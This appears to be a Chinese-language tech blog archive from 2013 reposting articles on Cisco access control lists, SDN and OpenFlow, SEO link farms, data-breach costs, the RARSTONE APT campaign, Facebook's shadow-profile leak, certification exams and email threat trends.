1. 增加一筆存取控制規則的指令
2. 刪除特定一筆存取控制規則的指令
3. 將特定存取控制規則套用到某介面上的指令
4. 刪除已經套用在介面上的規則的指令

這些步驟是一般設定標準型存取控制清單的步驟,與虛擬終端介面並沒有直接關連,因此這些步驟同時適用於所有介面。

增加一筆存取控制規則 

基本的設定語法格式如下所示:



由於這裡要設定的是標準型存取控制清單,所以存取控制規則的識別碼範圍為1到99之間,而mask指的是字元遮罩,這個字元遮罩可輸入也可忽略,若沒有輸入字元遮罩,預設值是0.0.0.0。

字元遮罩是用來指定一個以上的位址,不過不同的是,在存取控制清單中,位元值為0代表符合(Match)目前這個位元值所對應的位址值,而位元值為1代表忽略(Ignore)。這點與子網路遮罩剛好是相反的,在子網路遮罩中,位元值為0代表忽略,位元值為1則代表要符合。

剛剛提過這裡字元遮罩的預設值是0.0.0.0,因此代表要符合前面輸入的IP位址的每一個位元才能套用這個存取控制規則。

所以,假設要在某台Cisco路由器設備上增加一筆存取控制規則,是可用來允許10.1.152.43這台機器所發送過來的網路封包,則設定指令如下所示:



由此可以看出,這裡將這條規則的識別碼設定為「46」。

刪除一筆存取控制規則

若要刪除某一筆存取控制規則,其指令格式如下:



這是標準的反向操作指令,在Cisco IOS中很多指令的反向操作通常都只是在原本指令的前面加上no關鍵字。所以,若要刪除剛剛上面所增加的存取控制規則,只要執行以下指令即可:



套用存取控制規則到介面上 

準備好存取控制規則之後,接下來就是把所設定好的存取控制規則套用到介面上,其指令格式如下:



為了要設定到某個介面上,第一步必須先進入特定介面的Interface Mode底下,所以讀者可以看到上面的指令的模式是必須在(config-if)底下才能執行。ip access-group是關鍵字,後面只要接上存取控制規則的識別碼,然後指定要套用在inbound或是outbound。方向的選擇也可以不指定,若不指定的話,預設只會套用在outbound方向上。

移除已經套用在某介面上的規則

這裡的作法其實也是類似,只要執行反向指令即可。原本要把規則套用在某個介面上的指令是ip access-group,因此若要將這條規則從介面上移除,只要在原本的指令前面加上no關鍵字即可,如下所示:



以上就是透過存取控制清單來提升網路安全的作法,當然還會有很多其他技術細節需要注意,之後會陸陸續續為各位介紹。

本文作者:胡凱智
轉載自《網管人》

網路為何要軟體定義?看清SDN的牌局

軟體定義網路眾所矚目
網路為何要軟體定義?看清SDN的牌局

OpenFlow只是一個協定,就像USB Disk所使用的USB協定一樣,真正有價值的是USB Disk裡的資料,而非這個協定。同樣的,在「以服務驅動的架構」之下,有價值的不是OpenFlow這個協定,而是透過它所建構的服務。

自從SDN(Software Defined Network,軟體定義網路)2012年開始成為熱門議題,延燒到2013年仍是各家網通廠商極力宣傳的關鍵字。筆者常在許多演講或私下場合被問到相關技術的市場概況,雖然樂見業界認同SDN的概念,但也擔心SDN淪為充斥混淆訊息的行銷名詞,非但無法呈現其商業價值,反而日後可能成為票房毒藥。

其實在今日SDN並不是一個「民生必需品」,因為多數的網路環境,沒有它照樣可以運行得很好。但是從熱門的雲端相關應用Infrastructure as a Service、Platform as a Service與Software as a Service等來看,可以發現一個共通點,那就是「Service」。

以「服務」的角度驅動網路建構所需要的環境,並且根據實際網路需要的狀態,提供程式化的服務策略及規模的需求,才是我們對於SDN的需要。

這也是當前硬梆梆的網路概念所無法支持的「以服務驅動的網路基礎架構」(Service Drives Network Infrastructure)觀念。

讀者可以思考,目前維運的網路是否真的需要這種投資。什麼樣的環境才會需要這種高靈活及彈性的網路?一定不是靜態的伺服器或是大型主機,因為這些設備就像大樹一樣屹立不搖,或許多年也不會有變動網路的需求。

但是被高度虛擬化的伺服器(Server Virtualization)可就完全不一樣了,Hypervisor根據用戶或是服務運行的狀態被動地產生、刪除、變更、搬移,越來越多應用的環境已經完全架構在伺服器虛擬化之上,這對網路營運來說就是很大的負擔,因為我們使用的網路概念就像工作了超過30年的老先生,已經跟不上這個跑在雲端上的年輕小夥子所需要的彈性和速度。

多租戶雲非SDN不可

若問哪種網路環境一旦沒有SDN就幾乎無法順利營運,目前看來,多租戶的雲端(Multi-Tenancy Cloud)環境會是首當其衝的痛苦者(Sufferer)。以下舉幾個例子,希望能幫助讀者了解這個網路層面上的苦難。

VLAN數量不足 

一個L2 Domain可用的VLAN數量至多支援4094個。如果用戶使用4個VLAN,整個網路只可規劃(provision)1000左右的用戶,並需要建構新的L2 Domain繼續提供服務,但是新舊的L2 Domain卻無法合併運用,而且平均網路背板(Fabric)的運轉效率可能達不到規模的30%。

TCAM記憶體不足(Memory Overflow) 

一般機架交換機(ToR)僅需要服務20台左右規模的靜態伺服器,但在伺服器虛擬化之後,即使保守以1:10的比例來看,伺服器規模也會立刻成長10倍。

加上以VLAN Trunk為基礎的便利連結方式,每一個ToR因為VLAN Trunk所帶來的ARP訊息更會呈等比級數增加,最終導致TCAM Overflow成為單點故障。可怕的是,這個問題在許多的除錯過程(Troubleshooting)中不易察覺。

服務可控度低 

前面提到以服務驅動基礎架構的議題,在這裡更可以看出更明顯的差異。以多租戶的雲端環境來看,每一個租戶的服務需求各有不同,所以網路管理員幾乎不可能以人力一一應對,用戶更不可能為此等待數個小時。與時間賽跑的商業服務,需要以SDN這樣的技術,建構具有高度彈性的基礎建設,才能符合雲端服務市場需求。

本末倒置的迷思 

觀察SDN議題在市場上被廣泛討論,其主軸往往圍繞著OpenFlow這個協定,但OpenFlow真的是救世主方案嗎?筆者很幸運在前幾年加入Nicira公司(現為VMware網路及安全事業群),它是全世界第一個對OpenFlow進行產品化的商業公司,主要成員也是OpenFlow發源地史丹佛大學的早期開發團隊。

某次與發明OpenFlow概念的Nicira技術長Martin Casado對談時,他說,OpenFlow只是一個協定,就像USB Disk所使用的USB協定一樣,真正有價值的是USB Disk裡的資料,而非這個協定。

其實如果讀者理解前面所提到的「以服務驅動的架構」,到此應該可以理解,有價值的不是OpenFlow這個協定,而是透過它所建構的服務。所以SDN是不是民生必需品?未來不敢說,但至少今天可能是只有特定的服務型態,才需要它的支持。

OpenFlow兩大模式 

在現今OpenFlow發展中,存在著兩個不同類型,一種是Hop by Hop模式,另外一種則是Overlay模式。

Hop by Hop模式 

這是OpenFlow最早期的發展模式,Edge Device(OpenFlow交換器)將未知數據流的第一個數據封包發送給OpenFlow Controller作為路徑演算的條件,如果一條路徑需要經過5個Hop Count,這樣的行為至少重複5次才能畫出一條 Slice Topology,而OpenFlow Controller也就是坐落在Data Panel之上。

在公開網路中,如果透過這種模式進行Topology的學習,OpenFlow Controller將承受極大的流量壓力,成為最主要的瓶頸點。如果要預先載入Flow Table以解決學習的問題,先需要知道完整網路訊息以建立Slice Topology Flow,操作比傳統網路更為複雜。 

Overlay模式 

這是OpenFlow逐漸發展之後所開發出來的新型運作模式,透過API直接對OpenFlow Controller定義需求網路Topology的型態,並且發送Flow更新至Edge(OpenFlow交換器),Edge便可以根據Flow定義結果,在本地建立IP Tunnel作為數據轉發的橋樑。


▲Overlay模式透過API直接對OpenFlow Controller定義需求網路拓撲型態,並發送Flow更新至Edge (OpenFlow交換器),在本地建立IP Tunnel作為數據轉發的橋樑。

這個模式,因為OpenFlow Controller不坐落在Data Panel上,所以不會成為瓶頸點,並且透過IP Tunnel的模式,同時間也抽象化了物理網路,讓由Overlay模式所建立的邏輯網路,不受限於傳統L2網路邊界或設備可達範圍,只要是IP連線能到的地方,SDN Overlay Network就能存在。

目前在市場上,硬體架構的OpenFlow交換器的廠商還是以Hop by Hop模式為主。如果是以Overlay的模式運作,Open vSwitch是廣泛被應用的開放式交換器軟體,多半是安裝在服務虛擬化平台(Hypervisor)。 此運作模式是直接在內部連接虛擬伺服器及網路,無須基於OpenFlow的硬體交換器就可達成SDN的需求,尤其對於多租戶的雲端環境來說,節省了特殊硬體成本的開銷,也達成了服務驅動網路架構的目的。

為何使用Tunnel協定 

近來市場上也有許多關於Tunnel協定的討論,如VxLAN、NVGRE、GRE或是STT,主要的課題鎖定在如何跨三層網路延伸二層網路,且應用場景幾乎都在高度虛擬化的資訊中心服務內,鎖定的痛點也都說明現今網路的規模不足及簡化網路的架構。這其實呼應了前文所提及規模化服務網路的需求,及根據服務驅動網路的概念。

Tunnel技術解決了L2網路規模化的問題,但並沒有完全命中簡化複雜網路的需求。因為這個概念只涉及L2網路連線的建立,而沒有滿足更細節的網路服務需求,如QoS、MAC Spoofing、ACL或是Layer 3及更高層服務網路的建立。

至於如何利用Tunnel傳遞更多的網路應用需求,便是OpenFlow Overlay架構的目標,而非建立規模很大但功能單純的網路來面對用戶複雜的需求。

往往有人質疑Tunnel的封裝會大量消耗操作系統CPU資源,但很幸運的是,今日許多晶片廠商已開發出x86系統上的卸載(Offload)機制,Tunnel協定本身更可以直接結合於核心(Kernel)之中,事實上在x86系統上,網路傳輸及同時降低CPU耗損的目標已經實現。

SDN方案誰提供 

硬體網路技術已經非常成熟,產品差異變得越來越小,但服務需求的差異卻越來越大。如前面所說,網路必須有能力去面對各種不同的動態需求的挑戰,目前大致有幾種類型的廠商能夠提供相關服務:

1.成熟的網路設備商 
這一類型的廠商是生產網路硬體設備為主,著重在效能及連接密度,為網路提供非常良好的傳輸媒介。這也是我們天天都在使用的網路設備。

2.SDN元件商 
最重要的就是SDN Controller,畢竟Controller這個控制元件是SDN核心技術之所在。至於OpenFlow交換器,因為在功能上為接受者,所以雖然跟SDN的議題有相關,但畢竟不是主導元件,所以地位相對沒有Controller的廠商來得重要,但也還是必要元件之一。

3.網路抽象化(Abstraction)廠商 
幾乎都是軟體和晶片廠商的天下,重點在於把現有的IP網路建立成一個背板資源池(Network Fabric Pool),讓用戶的網路可以被任意部署,不需要再為L2網路的邊界而傷腦筋,這也是讓服務網路規模化的新選擇,代表技術就是VxLAN、STT、GRE或NVGRE等等。

4.網路虛擬化(Virtualization)解決方案商 
此類型廠商並非提供單一技術產品,而是全面性可以部署於生產環境的解決方案,包括了Controller、Edge Switch、Tunnel在同一方案之內,提供高度的網路效能、擴展性及靈活性。對於真正需要SDN網路的用戶來說,這才是所需要的統合式網路能力,而不再是元件堆疊後的一座危樓網路基礎建設。

一個都不能少

雖然受到業界的高度重視,但畢竟SDN自身無法變成一個獨立有價值的東西,真正有價值的是服務。網路、伺服器、儲存的關係是密不可分的,但是誰來協調這些元件?在雲端資訊中心裡,是由CMS(Cloud Management System)來扮演指揮者的角色,沒有了它,大家只不過是一群「烏合之眾」。

因為服務不可能單獨由網路所提供,伺服器沒有網路也無法傳遞服務,沒有儲存,重要的數據該何去何從?對雲端資訊中心的運轉而言,CMS是非常關鍵的工具,千萬不要忘記這個指揮官。

近期廣受關注的OpenStack就是一個代表性的CMS平台,透過協同運作的力量,擁有包含了8000名以上的個人會員、82個國家的社群、150家以上矽谷及其他地區的IT商業公司共同參與,全球超過600名的共同開發者。當然此外VMware vCloud、CloudStack等平台,也都是這方面出色的CMS平台。

所以當讀者如果開始做SDN的準備,希望不要忘記CMS這個重要指揮官。當然最重要的還是服務, SDN相關的技術則是扮演撐起服務的螺絲釘。

原作者:陳建民
轉載自《網管人》

Link Farm (連結農場) 長什麼樣子?

Link Farm (連結農場) 長什麼樣子?

我們之前很多文章談過link farm,但是都沒有很清楚的描繪出來link farm真正的長像。Link Farm到底長什麼樣子? 我們來看看吧 ...

以下是Moz.com的創辦人Randy說明Link Farm的影片:


很清楚的可以知道,Link Farm就是想要以人為的方式,製造連結來源多樣性的假像,所以會有以下的特徵:

(1) 註冊很多的網域來建置網站,控制權為同一單位或是個人,我們暫時稱為farm site(農場網站)。

(2) 這些farm site可能會互相連結,也可能購買或是操作farm site之外的連結進來,以增加其網站信賴度。

(3) 這些farm site最終會連往特定的網站,這些特定的網站就是farm site要提升搜尋排名的網站。

比較勤勞的方式是在 farm site的內文加入文字連結,連往特定的網站,而比較偷懶的方式是以sidewide的方式 (如側邊欄)把文字連結加上去。

但是不管使用什麼方式,內文的連結或是側邊欄的連結,都無法躲避link farm detection (連結農場偵測),因為其連結樣式(link pattern)就是跟自然連結不相同。

有些人以為,如果我撰寫一些相關的內容,然後再以上述方式連結,就可以說是「相關連結」而躲開連結農場的偵測。

其實Link Farm (連結農場)問題在於「人為操作連結以傳遞信賴度」,並不是「相關連結」就一定不會被判定為連結農場。

如下圖,farm1~farm5就是連結農場,target sites(目標網站)就是要提升搜尋排名的網站。


也就是我們在"網站SEO優化案例研究 (一):什麼是不自然連結?"已經說的,一個網站到底是否正常,不必去看單一的局部現象,而只需要去看整體輪廓,就可以看出「意圖」,你可以自我解釋說,我的連結是相關的,但是搜尋引擎可以很快速的從成千上萬的網站中知道你的連結是自然還是人為的,

也許發現搜尋引擎的漏洞然後加以利用,可以短暫的獲得好處,但是誠如Google品質指南所說的,Google 也可能對其他未列在品質指南的誘騙行為做出嚴厲的處分。不要抱有僥倖心理,認為某種欺騙手段未在品質指南中列出,Google 就會認可該手段。身為網站管理員,與其花費大量時間尋找漏洞加以利用,不如盡其所能維護基本原則,以便為使用者帶來更好的體驗,從而使網站獲得更高的排名。

所以其實只要摸著良心製作網站,根本不需要鑽營搜尋引擎的漏洞,也可以獲得很好的搜尋流量。

轉載自《台灣搜尋引擎優化與行銷研究院》

人為疏失與系統錯誤為企業資料外洩的主因

人為疏失與系統錯誤為企業資料外洩的主因

全球安全、儲存與系統管理解決方案領導廠商賽門鐵克(Nasdaq: SYMC)與Ponemon Institute共同發表2013年全球資料外洩成本調查報告(2013 Cost of Data Breach Study: Global Analysis)。這份新出爐的調查報告指出,2012年的資料外洩事件中,有三分之二是肇因於人為疏失與系統故障,將每筆外洩資料的平均成本推升到136美元(註1)。導致資料外洩的主因包括員工不當處理機密資料、缺乏系統控管,以及違反產業與政府規範。其中,醫療、金融及製藥等高度嚴格規範的產業,其資料外洩的成本較其他產業高出七成。

以全球市場而言,單筆顧客外洩資料成本較去年上升,然而,美國每起資料外洩事件的整體成本卻些微下降至540萬美元,主要原因是美國企業普遍設有資訊安全長職務(Chief Information Security Officer, CISO)、完備的資料外洩事件應變計畫,並全面推動資安防護措施。

Ponemon Institute董事長Larry Ponemon表示:「儘管外部攻擊者的攻擊手法日新月異,對企業造成莫大威脅,但來自公司內部的威脅也具同樣的破壞力與潛在危險。根據我們近八年來資料外洩成本的研究結果,對現今的企業而言,員工行為是最棘手的問題之一,從第一個相關調查報告發表至今,因員工不當行為所造成的資料外洩事件比例上升了22%。」

賽門鐵克資訊安全事業群執行副總裁Anil Chakravarthy表示:「這份報告指出,擁有完善的安全部署及應變計畫的企業,其資料外洩成本較其他企業少20%,因此全面性資安防護措施的重要性不言而喻。無論是存在個人電腦、行動裝置、企業網路或資料中心的機密客戶資料,企業都必須善加保護。」

賽門鐵克建議,企業可至Symantec’s Data Breach Risk Calculator網站,分析公司的資安風險。這項分析工具以企業組織規模、產業別、所在位置與安全措施做為分析基礎,來估算每筆外洩資料與企業面臨的資安風險。

其他重要發現還包括:

每筆外洩資料的平均成本依企業所在地區而有重大差異,差異成因包括威脅類型不同、各區域資料保護規範不同。有些國家如德國、澳洲、英國、美國等,其消費者保護法令與規範較為完善,其資料外洩成本也較高。如美國和德國企業一直都是資料外洩成本最高的國家(單筆外洩資料的平均成本分別為188美元和199美元),而這兩國企業的單起資料外洩事件整體成本也最高(分別為540萬美元及480萬美元)。

人為疏失與系統錯誤是資料外洩的主因。調查結果顯示,64%的資料外洩皆肇因於人為疏失和系統錯誤,先前的研究報告則顯示,62%的員工認為在公司以外的場合使用公司資料是合理的,其中多數員工使用完畢後也從不刪除資料,種下資料外洩的因子。這個現象說明了大部分資料外洩事件可能是內部員工所造成,以及可能的損失範圍有多大。受調九國當中,巴西企業最有可能發生人為疏失導致的資料外洩事件,而印度企業最有可能遭遇因系統故障或商業流程中斷造成的資料外洩,所謂的系統故障,包括應用程式失效、人為疏失造成的資料傾印(data dump)、資料傳輸時發生邏輯錯誤、身份認證或授權錯誤(不當存取)、資料復原錯誤等因素。

惡意程式和網路攻擊對全球企業造成的損失最高。總合所有調查結果發現, 37%的資料外洩歸咎於惡意程式與網路攻擊,這同時也是受調的九個國家中,成本最高的資料外洩事件成因。其中,美國與德國企業為惡意程式與網路攻擊付出的單筆外洩資料成本平均約為277美元(美國)和214美元(德國),是受調的九國企業中最高的,而巴西和印度企業最低,每筆外洩資料的成本分別為71美元(巴西)及46美元(印度)。此外,德國企業受到惡意程式與網路攻擊的可能性最高,其次為澳洲和日本。

企業採取行動能有效降低資料外洩成本。調查結果顯示,美國與英國企業大幅降低了資料外洩的成本,應歸功於這兩國的企業有堅強的安全部署及應變計畫,並普遍設置資訊安全長專責資訊安全事務。另一方面,美國和法國企業也因聘用了資料外洩修復顧問而降低資料外洩成本。

為避免資料外洩,並進一步降低資料外洩事件成本,賽門鐵克建議最佳作法如下:

1. 加強教育訓練,訓練員工善加處理機密資料。 
2. 採用防止資料外洩相關技術來識別敏感性資料,並預防機密資料外流。 
3. 建置加密技術及身份認證解決方案。 
4. 擬定資料外洩應變計畫,以及知會客戶的適當程序。 

第八年年度全球資料外洩成本調查報告是依據九個國家共計227家企業發生過的資料外洩事件分析而成,包括美國、英國、法國、德國、義大利、印度、日本、澳洲與巴西。受調九國個別與全球調查的摘要報告可從 http://bit.ly/10FjDik網站下載。報告調查中提及的所有資料外洩事件皆取樣自2012年,為了正確追蹤趨勢資料,Ponemon Institute並未將「巨量資料外洩事件」,也就是外洩資料總數超過十萬筆以上的單次資料外洩事件納入調查範圍。

轉載自《資安人科技網》

亞洲國家專屬APT 小心暗中竊取資料的RARSTONE

亞洲國家專屬APT 小心暗中竊取資料的RARSTONE

眾所週知,APT攻擊有區域性,日前趨勢科技就發現一個專門針對亞洲國家的APT攻擊Naikon,其攻擊目標以亞洲地區國家如印度、馬來西亞、越南、新加地等國的電信、媒體、油電、政府等產業為主。

Naikon攻擊流程與其他APT攻擊相同,都是從附有惡意文件的社交工程郵件開始,該惡意文件內嵌一隻名為RARSTONE的後門程式,使用的是微軟舊漏洞CVE-2012-0158,這個漏洞在去年開始狂掃100多國的Safe間諜活動中,也曾經被使用過。

首先,駭客先寄一封主題與亞太地區外交有關的郵件,當受害者點擊郵件附加的惡意word檔,就會將RARSTONE下載至電腦中,由於惡意程式元件是直接下載到記憶體中,而非下載任何檔案,因此可躲過一般file-based的掃描。

其實RARSNTOE這隻遠端存取木馬(RAT)並非第一次出現,今(2013)年2月趨勢科技就曾經通報過,今年4月在一波以波士頓馬拉松爆炸為主題的惡意郵件中,也曾發現過它的蹤跡,只是它會透過各種方式來躲避偵測,像是藉由解安裝機碼(Uninstall Registry Key)的方式,了解受害電腦所安裝的應用程式,並將與防毒軟體相關的AP解除安裝,同時,採用SSL加密與後端C&C伺服器溝通,由於與正常流量幾乎沒有區別,因此不容易被察覺。

從Naikon、Safe等此類精心設計的攻擊來看,目標式攻擊越來越多,且攻擊手法越來越難以察覺。根據FireEye在今年4月發佈的《進階網路攻擊》分析報告指出,駭客大量使用C&C伺服器並保持與受害機器溝通,以便駭客下載並修改惡意程式,躲避目標企業的偵測,同時暗中匯出機密資料並繼續擴大在企業的攻擊。

這份報告更進一步指出,受攻擊熱門地區為亞洲、東歐等國,且科技公司由於擁有智慧財產機密資料,為被高度回撥攻擊的目標,且大部分使用回撥的APT攻擊,大都源自於中國,或中國開發的攻擊工具,其中最主要的工具為Gh0st RAT。

面對目標式攻擊,趨勢科技認為,過去以黑名單、周邊防禦的防護模式可能不再管用,企業除了做好社交工程演練、定期修補更新外,還要加強主機稽核監控、檔案異動監控等防禦機制。

轉載自《資安人科技網》

八個步驟制定企業社群媒體經營策略

八個步驟制定企業社群媒體經營策略

Infographic of the Day: Your Social Media Strategy in 8 Steps

隨著社群觀念越漸風潮及普及,很多企業事先無任何作戰計劃就開始經營自己的社群媒體並涉獵各個平台,導致有點半調子的狀態。

社群的經營不能只是先求有再求好這麼單純,它仍是需要完善的策略去支持、執行經營目標。這則資訊圖表列出了八個步驟,教企業如何有計劃的安排社群經營。

1.建造一個方舟
沒有一個人或是一個部門可以自己完成社群媒體的策略,你需要一個包含跨職能的團隊,讓大家集思廣義,一同實現你們的戰術和管理經營。

2.傾聽和比較
這是常識,但往往被忽視。你可以擴展專屬於你品牌的關鍵字或詞組,提供消費者一個很好的指南去找到你,而你也藉由傾聽消費者的聲音知道應該如何活躍於社交媒體。

3.你的重點是什麼
社交媒體可以被用來幫助企業實現各種業務目標,然而你經營社群媒體的目的主要是什麼?社會意識?業務銷售?保有消費者對你的忠誠度?至少在初期,先挑一個重點來呈現你的策略方向吧。

4.選擇成功指標
你打算如何來確定是否加入社群媒體的商業價值? 你會使用什麼關鍵績效指標,
來評估你的社群媒體有效?過去喜歡的策略要如何延續發展成長?會衡量投資回報率嗎?

5.分析你的聽眾
你的聽眾喜歡什麼?有何特性?要如何與他們互動?這些都會影響你在社群經營的調整及操作方向。

6.什麼是能夠表達「你」的一件事?
這裡不是說你是誰,你賣什麼或是你的產品功能如何,若你無法創建一個讓觀眾值得激動的事件,要如何讓消費者了解「你」到底是什麼。就像迪士尼不只是電影,它是魔術,給了大家夢想;蘋果也不只是技術,它代表了一個創新,而你,你是什麼?

7.如何用人類的模式對話
社群媒體是關於人與人的互動,而非對應一個logo、標籤,因此你要像一個人一樣的去與消費者對話,就像對待朋友、家人或同事,不是以一個物件的形象,你將如何做到這一點呢?

8.創建一個頻道計劃
當你知道你該怎麼活躍於社群媒體時,接下來你就可以把你的注意力放置多的地方,去衡量是否也可以成功,像是Facebook、Twitter、Blog等等,並一樣的有計劃去參與經營這些平台。

Infographic of the Day: Your Social Media Strategy in 8 Steps

轉載自《WIS 匯智資訊》

2013年6月25日 星期二

臉書漏洞愈補愈大 「影子設定檔」資料蒐集地下作業意外曝光

臉書漏洞愈補愈大 「影子設定檔」資料蒐集地下作業意外曝光

上週五臉書(Facebook)宣佈某個已不小心造成600其修補了萬以上使用者個人資訊外洩的安全漏洞,該公司並坦承指出,這是因為臉書前所未知之所謂「影子設定檔」(shadow profile),在與資料歷史記錄請求中的使用者帳號進行合併時,所意外造成的。



根據路透社指出,該資料外洩打從2012年年初開始,已持續一年之久。

該漏洞所造成的個人資訊外洩,主要是使用者尚未給臉書的資訊,換言之,該資料是臉書在未經使用者同意下,背地裡對其使用者進行相關編譯作業的資料。

為數眾多且仍在持續成長的臉書使用者為此感到憤怒,並要求透露到底有哪些人看過這些他們壓根沒有提供給臉書的個人資訊。

隨著使用者以臉書「下載你的資訊」(Download Your Information, DYI)工具來下載其帳號壓縮檔時,臉書會隨即將使用者「影子設定檔」與其臉書設定檔進行整合,然後再從某巨量資料群集中,將該合併資訊吐給該使用者。

根據臉書在週五下午其官方部落格中的坦承貼文指出,臉書似乎獲得使用者異地電子郵件位址與電話號碼等資訊,並嘗試將其與其他帳號進行比對。很顯然的,這些偷偷蒐集的資訊,隨即會儲存在每個使用者的特定「影子設定檔中」,而且這些設定當會以某種方式與帳號相連結。

使用者對於與他們有關的異地資料,結果被蒐集、被比對,並最後被臉書儲存一事一概不清楚。

資料來源:ZDNet
轉載自《網路資訊雜誌》

2013年6月24日 星期一

國家丙級證照考試是怎麼了?這樣是幫學生還是害學生?

國家丙級證照考試是怎麼了?這樣是幫學生還是害學生?



當然,應該不是所有的丙級證照都問題。不過每次在證照新聞出來的時候(例如昨天才出來的『3年54證照 「想當下個張忠謀」』新聞),都會看到類似像考這麼多證照沒用啦、許多證照是騙錢之類的說法。由於很少接觸這方面的資訊,看到類似說法總會覺得奇怪。即便是填鴨主義式的考試,只要有適當的範圍與教材,就算有些問題,再怎麼樣也應該都會有鑒別度,會到「沒用」這樣的地步嗎?

不過昨天在FB看到Even貼上關於「網頁設計」的丙級證照題庫之後,終於能夠體會為何有人會講出證照無用的話來。Even貼了底下這張圖:



看到上面的題目不知道有沒有人會覺得好笑?現在是什麼年代了,還在講Dreamweaver CS3以及FrontPage(啊靠……居然還看到這套軟體,連不是很了解網頁設計的我,都知道現在很難找到FrontPage了吧,這已經是超越10年前的古董了)。內心只有……無言,這是考「網頁設計」還是考「網頁設計歷史」?尤其是FrongtPage……這個脫節會不會太大?Even還說如果他去考的話,大概真的沒辦法拿到丙級證照,這些考題的時間似乎是凍結在十年前。

因對網頁設計領域並不是那麼了解,所以也跟Even聊了一下。他提到這些題目看起來離譜,但事實上的確就是如此沒錯。Even的新進員工剛好是新鮮人,在去年也有考過這證照,確實會考到一些關於FrontPage。而且學校就是這樣教,去外面聯成補習也是教DW + FP組合。

也有反問Even,目前做網頁設計使用的相關軟體主要是哪些。他提到Dreamweaver(底下簡稱DW)的確是有,不過現在已經是CS6。另外,真正接案公司或是設計公司所用的是sublime(丙級想來是不會考這個了XD)。

Even再補充一些他目前所看到的網頁設計現況,提到:

「國外許多設計師都用Coda 2軟體做網頁 ,直到去年就突然變為Sublime Text。 原因是速度快、外掛多、編輯 html 非常好用。至於預覽的問題都是改為直接使用 browser 預覽,原因是這樣比較穩。

以前有時候用DW預覽,會發現DW在騙你。所以DW有些式微的原因也在此,另外就是DW越來越肥大且貴。此外他們目前都會使用一套叫做 fireapp 的網頁打樣工具,才14塊美金,可以協助專業設計師在沒有文字內容資料的狀況下就能做設計判斷,避免一些爆版破版的情況,而且是跨平台 PC、Mac、Linux都能用。(順帶一提,據他提到這軟體是台灣人開發的,目前賣到全世界很紅。)

現在考證照這回事真的脫離了現實十年左右……

照理說不應該針對特定軟體來考,而是要針對網頁設計的知識去考才對,比如說考html語法怎麼用,而不是要點選某個軟體的哪裡之類的,這樣可能會比較理想。」

聽完Even所提的,大概可以理解不少人說現在證照無用的原因了,看到「網頁設計」證照的題目居然是這樣,實在很難想像這樣的證照是能加多少分。

現在丙級證照有這麼大的狀況,難道大家都不知道嗎?事實上主辦單位、老師教授,甚至補教業者也都清楚問題狀況。個人私底下也問過一些人,在網路上也看得到一些有關發言,看來源頭跟教育部有些關係。教育部將證照列到教學評鑑中,站在學校的立場,評鑑要好看當然就會要求老師。而老師為了考績自然也會要求學生去考證照。

但最大的問題是內容呢?反正教育部主要是看證照數與錄取數。於是要考的證照愈來愈多,為了提升錄取率老師以題庫為教材,補教業者當然也跟著題庫教DW + FP。學生考得多,拿到的證照也多,這樣學校的評鑑優良還可以順便大打廣告。老師考績好,家長看到自己的小孩這麼優秀也會很爽。證照業者、補教業者也因為證照賺了一筆,看來真是皆大歡喜。

只不過考這樣內容的東西,對學生真的好嗎?在學生最黃金的時間,因為證照而所教授內容竟然是這些的時候,不禁要為學生所浪費的時間感到婉惜。



話說,其實也不是所有的題目都很糟糕的,有一些講觀念的其實還出得不錯(不過怎會看到好多Windows XP考題,人家微軟都快要不支援了……)。

有興趣看看自己能不能過丙級,可以來這個網頁試試線上測驗

轉載自《癮科技》

Openfind 發表 2013 年第一季電子郵件威脅分析報告

Openfind 發表 2013 年第一季電子郵件威脅分析報告

國內知名軟體廠商網擎資訊(Openfind Information Technology, Inc.),今日發表針對台灣地區所整理的第一季電子郵件威脅樣本報告,提出以下重點內容說明。 

Openfind 2013年第一季電子郵件威脅分析報告重點

垃圾信來源 
垃圾信來源國家的前三名分別為中國、澳洲與日本,依序佔整體垃圾信的 31 % 、14% 與 8%。延續上一季結果,中國仍為全球主要垃圾郵件來源,百分比例為第二名的澳洲的兩倍以上,第三名則從上一季的美國易主為日本。台灣地區本季排名第8,佔比4%。

URL 內容解析 
Openfind 電子郵件威脅實驗室與鴻璟科技共同合作,深入觀察垃圾郵件所包含的 URL 網頁內容,並將網頁進行分類。最多的網頁主題為購物相關類別,超過5分之1的垃圾郵件網址會導引收件人前往購買物品之網頁,多為商品廣告、EDM 與商品目錄等等購物訊息。

垃圾郵件內容所囊括的種類相當多元,但也間接反映出網路使用者普遍較為關心的主題,除了網路購物外,在財務方面對於商業訊息、投資快訊佔有重要比例。而在休閒議題上面,演藝娛樂、旅遊景點或社群網路服務也都榜上有名。網路威脅越來越貼近民眾生活,除了建議網路使用者在開啟不明來源之郵件時,提高警覺之外,亦建議於系統端加強外部網頁安全風險等級自動化提示機制。

垃圾信散播手法 
本季較常見的三大垃圾信散播手法如下所列:

1. 隱藏具有威脅的非法網址 
具有威脅或不正當目的的垃圾郵件多會夾帶危險性無法預期的網頁連結,常見的手法即是巧妙營造信件中超連結存在的合法性;為了隱藏帶有威脅的真實網址位置,除了轉址服務或短網址服務網站,有些攻擊者自己也申請網路上的主機名稱,幫助作轉址來隱藏目標網站網址。

2. 益發精緻化的偽造EDM 
傳統的垃圾信僅以文字、連結甚至是以簡體字所撰寫,讓收件者在收到信的當下即可瞬間辨識出的廣告信件,目前的廣告信件有著傾向更注重設計感及版面編排的趨勢,讓質感大幅提升至精美 EDM 等級,除了透過將超連結放置在漂亮的圖片中誘使收件人點擊外,還有更具吸引力的退訂連結,均可讓收件人連結至目標網站。

3. 社交工程攻擊 
除了帶有超連結的垃圾信以外,本季中發現不少疑似社交工程攻擊的信件;此類垃圾信件通常會以與收件人熟識的立場撰寫郵件內文,再在信中夾帶如 Word文檔或WinRAR壓縮檔等附檔,而收件者匆忙之中往往會不經意的開啟附檔而中毒;因此面對挾帶附檔的可疑信件時,最好先經過其他管道確認郵件真實性後再開啟附檔,以免中病毒或是木馬。

更多有關於 2013 年第一季的電子郵件威脅分析報告及樣本說明細節,請至下列連結下載:2013 Q1電子郵件威脅分析報告

轉載自《資安人科技網》

2013年6月23日 星期日

網路安全測試實務(翁浩正)

網路安全測試實務(翁浩正)

網路安全一直都是資安的重要議題,到底網路安全要如何檢測?又要如何修補?駭客又是怎麼利用這些弱點進行攻擊的呢?本課程將結合理論及實務經驗,透過駭客攻擊者角度,協助開發者對自己的網路環境進行網路安全測試及修補。


轉載自《Youtube》

網頁安全分析 - 漏洞檢測入門(翁浩正)

網頁安全分析 - 漏洞檢測入門(翁浩正)

